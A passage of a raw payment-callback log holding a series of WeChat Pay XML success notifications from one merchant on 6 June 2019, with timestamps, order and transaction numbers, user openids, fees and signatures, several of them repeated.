<out_trade_no><![CDATA[756220190606115855]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[D9BB91367E356A587604ABF608536AC7]]></sign>
<time_end><![CDATA[20190606115904]]></time_end>
<total_fee>360</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000304201906065120339056]]></transaction_id>
</xml>
支付时间：2019-06-06 05:59:21
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[360]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[uwoxawcbx4fbzwq1bsuijeae225au8ua]]></nonce_str>
<openid><![CDATA[o6Iva5sjUMzVJHT3TDd4gjimg2zU]]></openid>
<out_trade_no><![CDATA[150520190606115854]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[A49C50E8BE6B67E20CAB06E3E2526231]]></sign>
<time_end><![CDATA[20190606115903]]></time_end>
<total_fee>360</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000297201906066919400589]]></transaction_id>
</xml>
支付时间：2019-06-06 06:00:07
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[630]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[upek5vun06ptphbbkrjo1bm27mf0khc2]]></nonce_str>
<openid><![CDATA[o6Iva5sTgmKAtIswrUlTJEJczUE8]]></openid>
<out_trade_no><![CDATA[207320190606115958]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[8975E29E15C367684DE66B09A7BD18AD]]></sign>
<time_end><![CDATA[20190606120006]]></time_end>
<total_fee>630</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000295201906063552505021]]></transaction_id>
</xml>
支付时间：2019-06-06 06:00:23
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[630]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[upek5vun06ptphbbkrjo1bm27mf0khc2]]></nonce_str>
<openid><![CDATA[o6Iva5sTgmKAtIswrUlTJEJczUE8]]></openid>
<out_trade_no><![CDATA[207320190606115958]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[8975E29E15C367684DE66B09A7BD18AD]]></sign>
<time_end><![CDATA[20190606120006]]></time_end>
<total_fee>630</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000295201906063552505021]]></transaction_id>
</xml>
支付时间：2019-06-06 06:00:52
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[450]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[jdxlukx0g5nhyd5jaa9kbvvyyqelw8mw]]></nonce_str>
<openid><![CDATA[o6Iva5sTgmKAtIswrUlTJEJczUE8]]></openid>
<out_trade_no><![CDATA[716420190606120044]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[7C277DB2D2BAFD70B2B59709CBD7EE35]]></sign>
<time_end><![CDATA[20190606120051]]></time_end>
<total_fee>450</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000294201906060439442306]]></transaction_id>
</xml>
支付时间：2019-06-06 06:00:54
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[360]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[d6e7jrer8vtph0ahsovruqjvb74kkxgx]]></nonce_str>
<openid><![CDATA[o6Iva5uUtq4-UesLUvJCkRQUHzjQ]]></openid>
<out_trade_no><![CDATA[965020190606120044]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[DCCAF9EC84969EC4D311C13DBCEAF7A9]]></sign>
<time_end><![CDATA[20190606120053]]></time_end>
<total_fee>360</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000298201906069160836993]]></transaction_id>
</xml>
支付时间：2019-06-06 06:01:08
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[450]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[jdxlukx0g5nhyd5jaa9kbvvyyqelw8mw]]></nonce_str>
<openid><![CDATA[o6Iva5sTgmKAtIswrUlTJEJczUE8]]></openid>
<out_trade_no><![CDATA[716420190606120044]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[7C277DB2D2BAFD70B2B59709CBD7EE35]]></sign>
<time_end><![CDATA[20190606120051]]></time_end>
<total_fee>450</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000294201906060439442306]]></transaction_id>
</xml>
支付时间：2019-06-06 06:01:10
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[360]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[d6e7jrer8vtph0ahsovruqjvb74kkxgx]]></nonce_str>
<openid><![CDATA[o6Iva5uUtq4-UesLUvJCkRQUHzjQ]]></openid>
<out_trade_no><![CDATA[965020190606120044]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[DCCAF9EC84969EC4D311C13DBCEAF7A9]]></sign>
<time_end><![CDATA[20190606120053]]></time_end>
<total_fee>360</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000298201906069160836993]]></transaction_id>
</xml>
支付时间：2019-06-06 06:01:23
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[360]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[e9v1bewbuq69307pe014dgs5lqn1jjff]]></nonce_str>
<openid><![CDATA[o6Iva5rocKHwOkzPKW50lmVs-BRA]]></openid>
<out_trade_no><![CDATA[484320190606120114]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[972D5722DF6E7057B60E844F7F031964]]></sign>
<time_end><![CDATA[20190606120123]]></time_end>
<total_fee>360</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000305201906066890938988]]></transaction_id>
</xml>
支付时间：2019-06-06 06:01:40
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[360]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[e9v1bewbuq69307pe014dgs5lqn1jjff]]></nonce_str>
<openid><![CDATA[o6Iva5rocKHwOkzPKW50lmVs-BRA]]></openid>
<out_trade_no><![CDATA[484320190606120114]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[972D5722DF6E7057B60E844F7F031964]]></sign>
<time_end><![CDATA[20190606120123]]></time_end>
<total_fee>360</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000305201906066890938988]]></transaction_id>
</xml>
支付时间：2019-06-06 06:02:06
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[360]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[vjzg1yc8mqce3ezn3s58mx93sagluoyb]]></nonce_str>
<openid><![CDATA[o6Iva5soXBMvXz7KSZbx7PPf56bY]]></openid>
<out_trade_no><![CDATA[820020190606120157]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[055277476C8633C7D6B6FE8CC23A70DA]]></sign>
<time_end><![CDATA[20190606120206]]></time_end>
<total_fee>360</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000295201906064592330677]]></transaction_id>
</xml>
支付时间：2019-06-06 06:02:21
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[360]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[vjzg1yc8mqce3ezn3s58mx93sagluoyb]]></nonce_str>
<openid><![CDATA[o6Iva5soXBMvXz7KSZbx7PPf56bY]]></openid>
<out_trade_no><![CDATA[820020190606120157]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[055277476C8633C7D6B6FE8CC23A70DA]]></sign>
<time_end><![CDATA[20190606120206]]></time_end>
<total_fee>360</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000295201906064592330677]]></transaction_id>
</xml>
支付时间：2019-06-06 06:02:57
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[720]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[a24i56gqqq816dryth21rg5va6vhtai2]]></nonce_str>
<openid><![CDATA[o6Iva5qpp4wXb-fK9QiFOWRraJ4M]]></openid>
<out_trade_no><![CDATA[835420190606120248]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[3DA539B0E0BEE236850CD2EC17F04AD6]]></sign>
<time_end><![CDATA[20190606120256]]></time_end>
<total_fee>720</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000297201906068360564664]]></transaction_id>
</xml>
支付时间：2019-06-06 06:03:12
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[720]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[a24i56gqqq816dryth21rg5va6vhtai2]]></nonce_str>
<openid><![CDATA[o6Iva5qpp4wXb-fK9QiFOWRraJ4M]]></openid>
<out_trade_no><![CDATA[835420190606120248]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[3DA539B0E0BEE236850CD2EC17F04AD6]]></sign>
<time_end><![CDATA[20190606120256]]></time_end>
<total_fee>720</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000297201906068360564664]]></transaction_id>
</xml>
支付时间：2019-06-06 06:04:03
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[630]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[06tqr9gzigkzm4l3oh9267hdhnc8bg6t]]></nonce_str>
<openid><![CDATA[o6Iva5pjZqzuXckzqBKldXlZX4ro]]></openid>
<out_trade_no><![CDATA[928020190606120349]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[767C3523708B1A0287B7ACD2CAB6A3EC]]></sign>
<time_end><![CDATA[20190606120401]]></time_end>
<total_fee>630</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000293201906068526217605]]></transaction_id>
</xml>
支付时间：2019-06-06 06:04:19
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[630]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[06tqr9gzigkzm4l3oh9267hdhnc8bg6t]]></nonce_str>
<openid><![CDATA[o6Iva5pjZqzuXckzqBKldXlZX4ro]]></openid>
<out_trade_no><![CDATA[928020190606120349]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[767C3523708B1A0287B7ACD2CAB6A3EC]]></sign>
<time_end><![CDATA[20190606120401]]></time_end>
<total_fee>630</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000293201906068526217605]]></transaction_id>
</xml>
支付时间：2019-06-06 06:07:10
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[1260]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[iv03x8rchu6fpcfm1mvpwsj42qbfpdkg]]></nonce_str>
<openid><![CDATA[o6Iva5inXOR_ELnSFfPE5pNo8kOs]]></openid>
<out_trade_no><![CDATA[190620190606120701]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[1DB4081633F394B4A4975F63FAAEE27F]]></sign>
<time_end><![CDATA[20190606120709]]></time_end>
<total_fee>1260</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000308201906069532974407]]></transaction_id>
</xml>
支付时间：2019-06-06 06:07:26
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[1260]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[iv03x8rchu6fpcfm1mvpwsj42qbfpdkg]]></nonce_str>
<openid><![CDATA[o6Iva5inXOR_ELnSFfPE5pNo8kOs]]></openid>
<out_trade_no><![CDATA[190620190606120701]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[1DB4081633F394B4A4975F63FAAEE27F]]></sign>
<time_end><![CDATA[20190606120709]]></time_end>
<total_fee>1260</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000308201906069532974407]]></transaction_id>
</xml>
支付时间：2019-06-06 06:11:11
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[ABC_DEBIT]]></bank_type>
<cash_fee><![CDATA[450]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[7o4ei1g287t28nbuuop4gt11yn3tx7bk]]></nonce_str>
<openid><![CDATA[o6Iva5pjZqzuXckzqBKldXlZX4ro]]></openid>
<out_trade_no><![CDATA[531220190606121103]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[1AC0421D357D0A5D08A1D6D6FF049DE0]]></sign>
<time_end><![CDATA[20190606121110]]></time_end>
<total_fee>450</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000294201906062413522721]]></transaction_id>
</xml>
支付时间：2019-06-06 06:11:14
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[630]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[or93b77z0fcubrnx62nk70kv5puvb5ap]]></nonce_str>
<openid><![CDATA[o6Iva5t6ULiFJrio6Veww2M3YVSo]]></openid>
<out_trade_no><![CDATA[204720190606121103]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[86657A7BC8026140474825A829BFE020]]></sign>
<time_end><![CDATA[20190606121113]]></time_end>
<total_fee>630</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000308201906060286012055]]></transaction_id>
</xml>
支付时间：2019-06-06 06:11:27
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[ABC_DEBIT]]></bank_type>
<cash_fee><![CDATA[450]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[7o4ei1g287t28nbuuop4gt11yn3tx7bk]]></nonce_str>
<openid><![CDATA[o6Iva5pjZqzuXckzqBKldXlZX4ro]]></openid>
<out_trade_no><![CDATA[531220190606121103]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[1AC0421D357D0A5D08A1D6D6FF049DE0]]></sign>
<time_end><![CDATA[20190606121110]]></time_end>
<total_fee>450</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000294201906062413522721]]></transaction_id>
</xml>
支付时间：2019-06-06 06:11:31
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[630]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[or93b77z0fcubrnx62nk70kv5puvb5ap]]></nonce_str>
<openid><![CDATA[o6Iva5t6ULiFJrio6Veww2M3YVSo]]></openid>
<out_trade_no><![CDATA[204720190606121103]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[86657A7BC8026140474825A829BFE020]]></sign>
<time_end><![CDATA[20190606121113]]></time_end>
<total_fee>630</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000308201906060286012055]]></transaction_id>
</xml>
支付时间：2019-06-06 06:11:56
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[630]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[gxw307xvb7c4zejm7q507dgzjm8n9k05]]></nonce_str>
<openid><![CDATA[o6Iva5iZzGJKvwVaKs_OllSJx0IA]]></openid>
<out_trade_no><![CDATA[523220190606121145]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[74F84B81842977D28854552F36783724]]></sign>
<time_end><![CDATA[20190606121156]]></time_end>
<total_fee>630</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000298201906068373095557]]></transaction_id>
</xml>
支付时间：2019-06-06 06:12:12
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[630]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[gxw307xvb7c4zejm7q507dgzjm8n9k05]]></nonce_str>
<openid><![CDATA[o6Iva5iZzGJKvwVaKs_OllSJx0IA]]></openid>
<out_trade_no><![CDATA[523220190606121145]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[74F84B81842977D28854552F36783724]]></sign>
<time_end><![CDATA[20190606121156]]></time_end>
<total_fee>630</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000298201906068373095557]]></transaction_id>
</xml>
支付时间：2019-06-06 06:12:55
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[360]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[mbtxvvqhli1z6u9uzguoi4jaon5w85fg]]></nonce_str>
<openid><![CDATA[o6Iva5iZzGJKvwVaKs_OllSJx0IA]]></openid>
<out_trade_no><![CDATA[554120190606121245]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[25DF974B6216779CDCB157689C61788C]]></sign>
<time_end><![CDATA[20190606121254]]></time_end>
<total_fee>360</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000302201906069728888929]]></transaction_id>
</xml>
支付时间：2019-06-06 06:13:10
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[360]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[mbtxvvqhli1z6u9uzguoi4jaon5w85fg]]></nonce_str>
<openid><![CDATA[o6Iva5iZzGJKvwVaKs_OllSJx0IA]]></openid>
<out_trade_no><![CDATA[554120190606121245]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[25DF974B6216779CDCB157689C61788C]]></sign>
<time_end><![CDATA[20190606121254]]></time_end>
<total_fee>360</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000302201906069728888929]]></transaction_id>
</xml>
支付时间：2019-06-06 06:14:24
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[QMF]]></bank_type>
<cash_fee><![CDATA[630]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[ckc2b1z2jqm98ng769uxoq66vx4g290j]]></nonce_str>
<openid><![CDATA[o6Iva5m1F4pF8SjEupdMrv-IHL6k]]></openid>
<out_trade_no><![CDATA[486920190606121409]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[B341F44878B61F6CE748620CAF2D5813]]></sign>
<time_end><![CDATA[20190606121423]]></time_end>
<total_fee>630</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000292201906069860489173]]></transaction_id>
</xml>
支付时间：2019-06-06 06:14:40
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[QMF]]></bank_type>
<cash_fee><![CDATA[630]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[ckc2b1z2jqm98ng769uxoq66vx4g290j]]></nonce_str>
<openid><![CDATA[o6Iva5m1F4pF8SjEupdMrv-IHL6k]]></openid>
<out_trade_no><![CDATA[486920190606121409]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[B341F44878B61F6CE748620CAF2D5813]]></sign>
<time_end><![CDATA[20190606121423]]></time_end>
<total_fee>630</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000292201906069860489173]]></transaction_id>
</xml>
支付时间：2019-06-06 06:16:18
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[540]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[2ab3u5ommhtut47zgw8cxesrb3kqn9av]]></nonce_str>
<openid><![CDATA[o6Iva5o0lbsDTYV0he-yYqpQBT_I]]></openid>
<out_trade_no><![CDATA[814820190606121608]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[85FA9EB912579DDC66A14337B227A121]]></sign>
<time_end><![CDATA[20190606121617]]></time_end>
<total_fee>540</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000300201906064586024517]]></transaction_id>
</xml>
支付时间：2019-06-06 06:16:34
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[540]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[2ab3u5ommhtut47zgw8cxesrb3kqn9av]]></nonce_str>
<openid><![CDATA[o6Iva5o0lbsDTYV0he-yYqpQBT_I]]></openid>
<out_trade_no><![CDATA[814820190606121608]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[85FA9EB912579DDC66A14337B227A121]]></sign>
<time_end><![CDATA[20190606121617]]></time_end>
<total_fee>540</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000300201906064586024517]]></transaction_id>
</xml>
支付时间：2019-06-06 06:17:48
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[630]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[n5aoevq087uz5uzaxa2ja11he68huqc4]]></nonce_str>
<openid><![CDATA[o6Iva5jJcv9AqpIV1ue2UZFgHHko]]></openid>
<out_trade_no><![CDATA[204220190606121736]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[6BE2BF9D97F24D20D18C9B9AB97762DB]]></sign>
<time_end><![CDATA[20190606121747]]></time_end>
<total_fee>630</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000300201906061847857008]]></transaction_id>
</xml>
支付时间：2019-06-06 06:18:03
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[630]]></cash_fee>
